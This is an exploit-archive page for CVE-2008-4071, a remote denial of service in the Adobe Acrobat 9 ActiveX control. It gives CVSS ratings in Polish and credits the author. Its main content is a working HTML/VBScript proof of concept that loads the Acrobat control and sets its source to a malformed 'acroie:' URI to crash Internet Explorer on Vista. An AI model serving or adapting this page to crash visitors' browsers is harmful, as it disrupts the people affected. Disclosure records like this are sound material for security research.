Adobe Acrobat 9 ActiveX Remote Denial of Service Exploit

2008.09.17

Credit: Jeremy Brown

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2008-4071

CWE: CWE-20
CWE-noinfo

Ogólna skala CVSS: 5/10

Znaczenie: 2.9/10

Łatwość wykorzystania: 10/10

Wymagany dostęp: Zdalny

Złożoność ataku: Niska

Autoryzacja: Nie wymagana

Wpływ na poufność: Brak

Wpływ na integralność: Brak

Wpływ na dostępność: Częściowy

<!-- Jeremy Brown (0xjbrown41@gmail.com/jbrownsec.blogspot.com)
     Adobe Acrobat 9 Remote DoS (--) Tested on AA9/IE7/Vista
     I can't seem to reproduce this on XP! Oh well.
     Of course the most popular app for reading pdfs is SfS/SfI :)
     Basically it will crash with any uri that adobe doesn't like.
     Also interesting: try with file:///DoS and look in bottom left area -->

<html><body>

<object id=target classid=clsid:CA8A9780-280D-11CF-A24D-444553540000></object>
<script language=vbscript>

arg1="acroie:///DoS"
target.src = arg1

</script>
</body></html>

Referencje:

http://www.milw0rm.com/exploits/6424

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Adobe Acrobat 9 ActiveX Remote Denial of Service Exploit

Referencje:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.